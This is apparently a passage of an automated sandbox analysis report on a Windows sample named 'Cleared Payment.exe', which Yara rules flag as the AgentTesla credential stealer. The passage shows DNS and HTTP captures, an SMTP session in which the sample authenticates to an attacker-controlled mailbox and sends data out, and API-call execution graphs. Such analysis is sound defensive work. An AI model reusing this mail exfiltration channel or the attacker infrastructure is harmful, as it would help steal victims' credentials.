                                                          Apr 17, 2024 08:35:59.697662115 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.851125002 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.851264000 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.987848997 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:36:00.030514002 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:37:38.014286995 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:37:38.169331074 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:37:38.169358969 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:37:38.169420004 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:37:38.169471979 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:37:38.322999954 CEST58749714208.91.199.223192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 17, 2024 08:35:56.592880011 CEST6518553192.168.2.61.1.1.1
                                                          Apr 17, 2024 08:35:56.697422981 CEST53651851.1.1.1192.168.2.6
                                                          Apr 17, 2024 08:35:57.996125937 CEST6123353192.168.2.61.1.1.1
                                                          Apr 17, 2024 08:35:58.208534002 CEST53612331.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Apr 17, 2024 08:35:56.592880011 CEST192.168.2.61.1.1.10x56a1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:57.996125937 CEST192.168.2.61.1.1.10x700dStandard query (0)smtp.italiacanda-it.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Apr 17, 2024 08:35:56.697422981 CEST1.1.1.1192.168.2.60x56a1No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:56.697422981 CEST1.1.1.1192.168.2.60x56a1No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:56.697422981 CEST1.1.1.1192.168.2.60x56a1No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:58.208534002 CEST1.1.1.1192.168.2.60x700dNo error (0)smtp.italiacanda-it.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                          Apr 17, 2024 08:35:58.208534002 CEST1.1.1.1192.168.2.60x700dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:58.208534002 CEST1.1.1.1192.168.2.60x700dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:58.208534002 CEST1.1.1.1192.168.2.60x700dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                          Apr 17, 2024 08:35:58.208534002 CEST1.1.1.1192.168.2.60x700dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • api.ipify.org

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649712104.26.13.2054432548C:\Users\user\Desktop\Cleared Payment.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-04-17 06:35:57 UTC155OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                          Host: api.ipify.org
                                                          Connection: Keep-Alive
                                                          2024-04-17 06:35:57 UTC211INHTTP/1.1 200 OK
                                                          Date: Wed, 17 Apr 2024 06:35:57 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 12
                                                          Connection: close
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 875a65e20b0153ab-ATL
                                                          2024-04-17 06:35:57 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                          Data Ascii: 81.181.57.52


                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Apr 17, 2024 08:35:58.706649065 CEST58749714208.91.199.223192.168.2.6220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                          Apr 17, 2024 08:35:58.706886053 CEST49714587192.168.2.6208.91.199.223EHLO 494126
                                                          Apr 17, 2024 08:35:58.860692024 CEST58749714208.91.199.223192.168.2.6250-us2.outbound.mailhostbox.com
                                                          250-PIPELINING
                                                          250-SIZE 41648128
                                                          250-VRFY
                                                          250-ETRN
                                                          250-STARTTLS
                                                          250-AUTH PLAIN LOGIN
                                                          250-AUTH=PLAIN LOGIN
                                                          250-ENHANCEDSTATUSCODES
                                                          250-8BITMIME
                                                          250-DSN
                                                          250 CHUNKING
                                                          Apr 17, 2024 08:35:58.865853071 CEST49714587192.168.2.6208.91.199.223AUTH login c25wc3NAaXRhbGlhY2FuZGEtaXQuY29t
                                                          Apr 17, 2024 08:35:59.022391081 CEST58749714208.91.199.223192.168.2.6334 UGFzc3dvcmQ6
                                                          Apr 17, 2024 08:35:59.186510086 CEST58749714208.91.199.223192.168.2.6235 2.7.0 Authentication successful
                                                          Apr 17, 2024 08:35:59.188256979 CEST49714587192.168.2.6208.91.199.223MAIL FROM:<snpss@italiacanda-it.com>
                                                          Apr 17, 2024 08:35:59.344630003 CEST58749714208.91.199.223192.168.2.6250 2.1.0 Ok
                                                          Apr 17, 2024 08:35:59.345020056 CEST49714587192.168.2.6208.91.199.223RCPT TO:<snpss@italiacanda-it.com>
                                                          Apr 17, 2024 08:35:59.541800022 CEST58749714208.91.199.223192.168.2.6250 2.1.5 Ok
                                                          Apr 17, 2024 08:35:59.541960001 CEST49714587192.168.2.6208.91.199.223DATA
                                                          Apr 17, 2024 08:35:59.696962118 CEST58749714208.91.199.223192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                          Apr 17, 2024 08:35:59.697662115 CEST49714587192.168.2.6208.91.199.223.
                                                          Apr 17, 2024 08:35:59.987848997 CEST58749714208.91.199.223192.168.2.6250 2.0.0 Ok: queued as 7291A5006F0
                                                          Apr 17, 2024 08:37:38.014286995 CEST49714587192.168.2.6208.91.199.223QUIT
                                                          Apr 17, 2024 08:37:38.169331074 CEST58749714208.91.199.223192.168.2.6221 2.0.0 Bye

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:08:35:53
                                                          Start date:17/04/2024
                                                          Path:C:\Users\user\Desktop\Cleared Payment.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Cleared Payment.exe"
                                                          Imagebase:0x220000
                                                          File size:767'488 bytes
                                                          MD5 hash:0DF9817E2867F94E6BF0C066F9D88013
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:08:35:54
                                                          Start date:17/04/2024
                                                          Path:C:\Users\user\Desktop\Cleared Payment.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\Cleared Payment.exe"
                                                          Imagebase:0x1a0000
                                                          File size:767'488 bytes
                                                          MD5 hash:0DF9817E2867F94E6BF0C066F9D88013
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:08:35:54
                                                          Start date:17/04/2024
                                                          Path:C:\Users\user\Desktop\Cleared Payment.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Cleared Payment.exe"
                                                          Imagebase:0xb00000
                                                          File size:767'488 bytes
                                                          MD5 hash:0DF9817E2867F94E6BF0C066F9D88013
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:13.6%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:189
                                                            Total number of Limit Nodes:9
                                                            execution_graph 32936 8ed01c 32937 8ed034 32936->32937 32940 8ed08e 32937->32940 32943 4b62117 32937->32943 32947 4b62128 32937->32947 32951 4b62dd8 32937->32951 32960 4b60d3c 32937->32960 32944 4b62128 32943->32944 32945 4b60d3c CallWindowProcW 32944->32945 32946 4b6216f 32945->32946 32946->32940 32948 4b6214e 32947->32948 32949 4b60d3c CallWindowProcW 32948->32949 32950 4b6216f 32949->32950 32950->32940 32954 4b62e15 32951->32954 32952 4b62e49 32985 4b60e5c 32952->32985 32954->32952 32955 4b62e39 32954->32955 32969 4b62f70 32955->32969 32974 4b6303c 32955->32974 32980 4b62f61 32955->32980 32956 4b62e47 32961 4b60d47 32960->32961 32962 4b62e49 32961->32962 32964 4b62e39 32961->32964 32963 4b60e5c CallWindowProcW 32962->32963 32965 4b62e47 32963->32965 32966 4b62f70 CallWindowProcW 32964->32966 32967 4b62f61 CallWindowProcW 32964->32967 32968 4b6303c CallWindowProcW 32964->32968 32965->32965 32966->32965 32967->32965 32968->32965 32971 4b62f84 32969->32971 32970 4b63010 32970->32956 32989 4b63017 32971->32989 32992 4b63028 32971->32992 32975 4b62ffa 32974->32975 32976 4b6304a 32974->32976 32978 4b63017 CallWindowProcW 32975->32978 32979 4b63028 CallWindowProcW 32975->32979 32977 4b63010 32977->32956 32978->32977 32979->32977 32981 4b62f84 32980->32981 32983 4b63017 CallWindowProcW 32981->32983 32984 4b63028 CallWindowProcW 32981->32984 32982 4b63010 32982->32956 32983->32982 32984->32982 32986 4b60e67 32985->32986 32987 4b6452a CallWindowProcW 32986->32987 32988 4b644d9 32986->32988 32987->32988 32988->32956 32990 4b63039 32989->32990 32995 4b64460 32989->32995 32990->32970 32993 4b63039 32992->32993 32994 4b64460 CallWindowProcW 32992->32994 32993->32970 32994->32993 32996 4b60e5c CallWindowProcW 32995->32996 32997 4b6447a 32996->32997 32997->32990 33110 253e0a0 33111 253e0e6 GetCurrentProcess 33110->33111 33113 253e131 33111->33113 33114 253e138 GetCurrentThread 33111->33114 33113->33114 33115 253e175 GetCurrentProcess 33114->33115 33116 253e16e 33114->33116 33117 253e1ab 33115->33117 33116->33115 33118 253e1d3 GetCurrentThreadId 33117->33118 33119 253e204 33118->33119 32998 4b67690 32999 4b676bd 32998->32999 33026 4b674d4 32999->33026 33001 4b6771f 33002 4b674d4 CreateWindowExW 33001->33002 33003 4b67751 33002->33003 33004 4b674d4 CreateWindowExW 33003->33004 33005 4b67783 33004->33005 33006 4b674d4 CreateWindowExW 33005->33006 33007 4b677b5 33006->33007 33008 4b674d4 CreateWindowExW 33007->33008 33009 4b67819 33008->33009 33010 4b674d4 CreateWindowExW 33009->33010 33011 4b678e1 33010->33011 33012 4b674d4 CreateWindowExW 33011->33012 33013 4b67945 33012->33013 33014 4b674d4 CreateWindowExW 33013->33014 33015 4b679a9 33014->33015 33016 4b674d4 CreateWindowExW 33015->33016 33017 4b67a0d 33016->33017 33018 4b674d4 CreateWindowExW 33017->33018 33019 4b67a71 33018->33019 33020 4b674d4 CreateWindowExW 33019->33020 33021 4b67ad5 33020->33021 33022 4b674d4 CreateWindowExW 33021->33022 33023 4b67b9d 33022->33023 33024 4b674d4 CreateWindowExW 33023->33024 33025 4b67c65 33024->33025 33027 4b674df 33026->33027 33028 4b6be93 33027->33028 33031 2539390 33027->33031 33035 2537318 33027->33035 33028->33001 33033 25393cb 33031->33033 33032 2539691 33032->33028 33033->33032 33039 253ddc8 33033->33039 33036 2537323 33035->33036 33037 2539691 33036->33037 33038 253ddc8 CreateWindowExW 33036->33038 33037->33028 33038->33037 33040 253ddf9 33039->33040 33041 253de1d 33040->33041 33044 253df7a 33040->33044 33048 253df88 33040->33048 33041->33032 33045 253df95 33044->33045 33047 253dfcf 33045->33047 33052 253daf0 33045->33052 33047->33041 33050 253df95 33048->33050 33049 253dfcf 33049->33041 33050->33049 33051 253daf0 CreateWindowExW 33050->33051 33051->33049 33053 253dafb 33052->33053 33055 253e8e0 33053->33055 33056 253dc1c 33053->33056 33055->33055 33057 253dc27 33056->33057 33058 2537318 CreateWindowExW 33057->33058 33059 253e94f 33058->33059 33064 4b60758 33059->33064 33069 4b60770 33059->33069 33074 4b60822 33059->33074 33060 253e989 33060->33055 33065 4b60711 33064->33065 33066 4b60763 33064->33066 33065->33060 33067 4b607ad 33066->33067 33078 4b61040 33066->33078 33067->33060 33071 4b608a1 33069->33071 33072 4b607a1 33069->33072 33070 4b607ad 33070->33060 33071->33060 33072->33070 33073 4b61040 CreateWindowExW 33072->33073 33073->33071 33075 4b60829 33074->33075 33077 4b61040 CreateWindowExW 33075->33077 33076 4b608a1 33076->33060 33077->33076 33079 4b6106b 33078->33079 33080 4b6111a 33079->33080 33082 4b61f10 33079->33082 33083 4b61f5d CreateWindowExW 33082->33083 33084 4b61f29 33082->33084 33086 4b62094 33083->33086 33084->33080 33086->33086 33087 253bd38 33090 253be21 33087->33090 33088 253bd47 33091 253be41 33090->33091 33092 253be64 33090->33092 33091->33092 33098 253c0c8 33091->33098 33102 253c0b8 33091->33102 33092->33088 33093 253be5c 33093->33092 33094 253c068 GetModuleHandleW 33093->33094 33095 253c095 33094->33095 33095->33088 33099 253c0dc 33098->33099 33100 253c101 33099->33100 33106 253b858 33099->33106 33100->33093 33103 253c0dc 33102->33103 33104 253c101 33103->33104 33105 253b858 LoadLibraryExW 33103->33105 33104->33093 33105->33104 33107 253c288 LoadLibraryExW 33106->33107 33109 253c301 33107->33109 33109->33100 33120 2534668 33121 253467a 33120->33121 33122 2534686 33121->33122 33126 2534779 33121->33126 33131 2534204 33122->33131 33124 25346a5 33127 253479d 33126->33127 33137 2534879 33127->33137 33141 2534888 33127->33141 33132 253420f 33131->33132 33149 2535e24 33132->33149 33134 2537143 33153 2535e34 33134->33153 33136 2537167 33136->33124 33139 25348af 33137->33139 33138 253498c 33138->33138 33139->33138 33145 25344e4 33139->33145 33143 25348af 33141->33143 33142 253498c 33142->33142 33143->33142 33144 25344e4 CreateActCtxA 33143->33144 33144->33142 33146 2535918 CreateActCtxA 33145->33146 33148 25359db 33146->33148 33150 2535e2f 33149->33150 33151 2535e34 CreateWindowExW 33150->33151 33152 253816c 33151->33152 33152->33134 33154 2535e3f 33153->33154 33157 25372b8 33154->33157 33156 2538215 33156->33136 33158 25372c3 33157->33158 33161 25372e8 33158->33161 33160 25382fa 33160->33156 33162 25372f3 33161->33162 33163 2537318 CreateWindowExW 33162->33163 33164 25383ed 33163->33164 33164->33160 33165 253e2e8 DuplicateHandle 33166 253e37e 33165->33166

                                                            Executed Functions

                                                            Function 08600E48 Relevance: .6, Instructions: 596COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 021c1a87c6c597e62fc9e116fcb100678029a93bd3979b030593e82db996fec2
                                                            • Instruction ID: a6ed435373892f13b15be42b248be107dd458793881ec27ec17fbd8bb4440d7d
                                                            • Opcode Fuzzy Hash: 021c1a87c6c597e62fc9e116fcb100678029a93bd3979b030593e82db996fec2
                                                            • Instruction Fuzzy Hash: 09524A34A007458FDB14DF28C844B99B7B2FFC9314F2582A9D5586F3A1DBB1A986CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 08600E38 Relevance: .6, Instructions: 589COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0f73eb2b4dc79f08de8a2c7b18f022ceee464ad8acd1432e22d1aff56b5994f
                                                            • Instruction ID: f683c933a5e41407aa5f4840537505d5fc0d363c907df5d27fd8c6a6e2080c5e
                                                            • Opcode Fuzzy Hash: c0f73eb2b4dc79f08de8a2c7b18f022ceee464ad8acd1432e22d1aff56b5994f
                                                            • Instruction Fuzzy Hash: 65525A34A00745CFDB14DF28C840B99B7B2FF85314F2582A9D5586F3A2DBB1A986CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 08609340 Relevance: .2, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f89f006ba7338ad4c80b5eb092eb0653323a7d5b7b2c1ce27244c17bd01f4d99
                                                            • Instruction ID: 950fde06cfd9f5d641fd4aa35dddc18e5dfce2bcf77618c40a368dd6b797cca6
                                                            • Opcode Fuzzy Hash: f89f006ba7338ad4c80b5eb092eb0653323a7d5b7b2c1ce27244c17bd01f4d99
                                                            • Instruction Fuzzy Hash: 0B51F330A182658FC7198A7DD80026BBFB7EB85312F06816BE456CB2C7D274CD06CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253E090 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E11E
                                                            • GetCurrentThread.KERNEL32 ref: 0253E15B
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E198
                                                            • GetCurrentThreadId.KERNEL32 ref: 0253E1F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: d63e3c7407a4b3443293bdc2b04254852b50da6e4c28153041991aecf9d29d9d
                                                            • Instruction ID: d968543b5d051382da2773d913a3fc5b74c00bc05157760436adbb8100e6e865
                                                            • Opcode Fuzzy Hash: d63e3c7407a4b3443293bdc2b04254852b50da6e4c28153041991aecf9d29d9d
                                                            • Instruction Fuzzy Hash: 085187B09003498FEB19CFA9D948BDEBBF1FF88314F208059E408A7350CB74A944CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253E0A0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E11E
                                                            • GetCurrentThread.KERNEL32 ref: 0253E15B
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E198
                                                            • GetCurrentThreadId.KERNEL32 ref: 0253E1F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 72c3dfb64cccc4314a6ed6b7ce0b1f1eff3f8b3ee15ded003f686976b912f804
                                                            • Instruction ID: e69cc176a489b74e90db53585cde2ab542152ba8957a74785453e5195d9e1128
                                                            • Opcode Fuzzy Hash: 72c3dfb64cccc4314a6ed6b7ce0b1f1eff3f8b3ee15ded003f686976b912f804
                                                            • Instruction Fuzzy Hash: B55164B09003498FEB19CFA9D948BDEBBF1FF88314F208459E408A7350DB74A944CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253BE21 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1767 253be21-253be3f 1768 253be41-253be4e call 253b7f4 1767->1768 1769 253be6b-253be6f 1767->1769 1774 253be50 1768->1774 1775 253be64 1768->1775 1771 253be83-253bec4 1769->1771 1772 253be71-253be7b 1769->1772 1778 253bed1-253bedf 1771->1778 1779 253bec6-253bece 1771->1779 1772->1771 1822 253be56 call 253c0c8 1774->1822 1823 253be56 call 253c0b8 1774->1823 1775->1769 1780 253bf03-253bf05 1778->1780 1781 253bee1-253bee6 1778->1781 1779->1778 1786 253bf08-253bf0f 1780->1786 1783 253bef1 1781->1783 1784 253bee8-253beef call 253b800 1781->1784 1782 253be5c-253be5e 1782->1775 1785 253bfa0-253c060 1782->1785 1788 253bef3-253bf01 1783->1788 1784->1788 1817 253c062-253c065 1785->1817 1818 253c068-253c093 GetModuleHandleW 1785->1818 1789 253bf11-253bf19 1786->1789 1790 253bf1c-253bf23 1786->1790 1788->1786 1789->1790 1792 253bf30-253bf39 call 253b810 1790->1792 1793 253bf25-253bf2d 1790->1793 1798 253bf46-253bf4b 1792->1798 1799 253bf3b-253bf43 1792->1799 1793->1792 1800 253bf69-253bf6d 1798->1800 1801 253bf4d-253bf54 1798->1801 1799->1798 1824 253bf70 call 253c398 1800->1824 1825 253bf70 call 253c3a8 1800->1825 1801->1800 1803 253bf56-253bf66 call 253b820 call 253b830 1801->1803 1803->1800 1806 253bf73-253bf76 1808 253bf99-253bf9f 1806->1808 1809 253bf78-253bf96 1806->1809 1809->1808 1817->1818 1819 253c095-253c09b 1818->1819 1820 253c09c-253c0b0 1818->1820 1819->1820 1822->1782 1823->1782 1824->1806 1825->1806
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0253C086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 566f8417506de767be182cb8328c9ca5162f57daa5fbbeeb994324769693caa4
                                                            • Instruction ID: 2f19ce6a918d67bc75daedb9db5004cd9085fadb8865ce30c57a6e86658227b4
                                                            • Opcode Fuzzy Hash: 566f8417506de767be182cb8328c9ca5162f57daa5fbbeeb994324769693caa4
                                                            • Instruction Fuzzy Hash: A4813570A00B058FD725DF69D44079ABBF1FF88308F009A2AD48AD7A50D774E84ACF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04B61F10 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1826 4b61f10-4b61f27 1827 4b61f5d-4b61fd6 1826->1827 1828 4b61f29-4b61f50 call 4b60d10 1826->1828 1829 4b61fe1-4b61fe8 1827->1829 1830 4b61fd8-4b61fde 1827->1830 1832 4b61f55-4b61f56 1828->1832 1833 4b61ff3-4b62092 CreateWindowExW 1829->1833 1834 4b61fea-4b61ff0 1829->1834 1830->1829 1836 4b62094-4b6209a 1833->1836 1837 4b6209b-4b620d3 1833->1837 1834->1833 1836->1837 1841 4b620d5-4b620d8 1837->1841 1842 4b620e0 1837->1842 1841->1842 1843 4b620e1 1842->1843 1843->1843
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B62082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: e69a3f051af22368b84a147077c9502859e4f1cff4851aadac23656668b3528e
                                                            • Instruction ID: 78368ad390f747948363d02d73f7de3cf0cb9a45c8aa4ca259d500768358ab79
                                                            • Opcode Fuzzy Hash: e69a3f051af22368b84a147077c9502859e4f1cff4851aadac23656668b3528e
                                                            • Instruction Fuzzy Hash: 745102B1C00249AFDF15CFA9C880ADDBFB1FF48300F24819AE919AB261D775A855CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04B61F64 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1844 4b61f64-4b61fd6 1845 4b61fe1-4b61fe8 1844->1845 1846 4b61fd8-4b61fde 1844->1846 1847 4b61ff3-4b6202b 1845->1847 1848 4b61fea-4b61ff0 1845->1848 1846->1845 1849 4b62033-4b62092 CreateWindowExW 1847->1849 1848->1847 1850 4b62094-4b6209a 1849->1850 1851 4b6209b-4b620d3 1849->1851 1850->1851 1855 4b620d5-4b620d8 1851->1855 1856 4b620e0 1851->1856 1855->1856 1857 4b620e1 1856->1857 1857->1857
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B62082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 867490d677927bc5658c92088599025e365bb76f5b7491d987c7fcbd6596fd22
                                                            • Instruction ID: 745535d6cc9431e59de716c596153a79768477dfe2234f75289f49e159db3a96
                                                            • Opcode Fuzzy Hash: 867490d677927bc5658c92088599025e365bb76f5b7491d987c7fcbd6596fd22
                                                            • Instruction Fuzzy Hash: 1751AFB1D00349DFDB14CFA9C984ADEBBB5FF48310F24816AE819AB250D775A885CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04B61F70 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

